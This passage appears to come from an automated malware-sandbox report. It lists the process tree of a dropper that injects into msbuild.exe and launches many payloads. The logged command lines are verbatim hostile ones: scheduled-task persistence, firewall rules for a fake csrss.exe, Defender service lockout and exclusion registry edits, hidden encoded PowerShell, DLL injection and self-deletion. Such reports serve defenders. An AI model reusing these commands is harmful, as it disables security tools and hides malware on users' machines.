Z1z6oEWmHWh3S9fVhayDhyvW.exe 121 PID 1604 wrote to memory of 4948 1604 cmd.exe 135 PID 1604 wrote to memory of 4948 1604 cmd.exe 135 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2512
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1404
-
-
C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe"C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Users\Admin\AppData\Local\Temp\un4.0.exe"C:\Users\Admin\AppData\Local\Temp\un4.0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"5⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5620 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe7⤵PID:5956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4100
-
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:5528
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 27325⤵
- Program crash
PID:5668
-
-
-
C:\Users\Admin\AppData\Local\Temp\un4.1.exe"C:\Users\Admin\AppData\Local\Temp\un4.1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:4948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:5032
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 15124⤵
- Program crash
PID:4948
-
-
-
C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5268
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5328
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2732 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5344
-
-
-
-
-
C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5696
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2812
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5160
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:6104
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3776
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:3960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3176
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5516
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:5724
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:5468
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:2464 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:5968
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:5448
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe"C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 6165⤵
- Program crash
PID:100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 6485⤵
- Program crash
PID:4480
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 8844⤵
- Program crash
PID:1208
-
-
-
C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe"C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1464 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 11564⤵
- Program crash
PID:4856
-
-
-
C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4948
-
-
-
C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2004
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:4008
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5332
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
-
-
C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe"C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe"3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:440
-
-
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exeC:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6deae1a8,0x6deae1b4,0x6deae1c04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2260
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4424
-
-
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1880 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328142129" --session-guid=647b75d8-1d1a-401a-8239-98e5764e4505 --server-tracking-blob=Y2U2YTQyN2U5YjVmMmQ4YzU0ZTRjN2ZmZmY2YTQzODczNjNmOTVjMWM0ZWYzNWJjNGQyOWUxMzUxZTcxNzA5Yzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2MzU2ODAuNDc4OCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjdiOTU1ZDA5LTk4ZjktNDFhYy05MjA2LWQwOTBkM2FiMTJmMyJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=B0050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:3096 -
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exeC:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d52e1a8,0x6d52e1b4,0x6d52e1c05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3940
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:4540
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4136 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x3f0040,0x3f004c,0x3f00585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4440
-
-
-
-
C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe"C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe"3⤵
- Executes dropped EXE
PID:456 -
C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe.\Install.exe /YnGgdidyhQpz "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:4912 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:5132
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:5272
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5384
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:5588
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:5184
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:5284
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5344
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:5516
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDKGtXeHw" /SC once /ST 07:43:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:5800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDKGtXeHw"6⤵PID:5872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDKGtXeHw"6⤵PID:1484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\kzkUUCH.exe\" id /pNsite_idAWZ 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5880 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5696
-
-
-
-
-
-
C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe"C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe"3⤵
- Executes dropped EXE
PID:5760 -
C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:5996 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe.\Install.exe /YnGgdidyhQpz "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:3536 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:5584
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:5164
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5660
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:5676
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:5604
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:5136
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5208
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:5664
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOEzsPtTT" /SC once /ST 10:56:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:3176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOEzsPtTT"6⤵PID:5612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOEzsPtTT"6⤵PID:5928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe\" id /WZsite_idxpt 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5648
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵PID:2304
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4912 -ip 49121⤵PID:4064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 832 -ip 8321⤵PID:4540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5084 -ip 50841⤵PID:2668
-
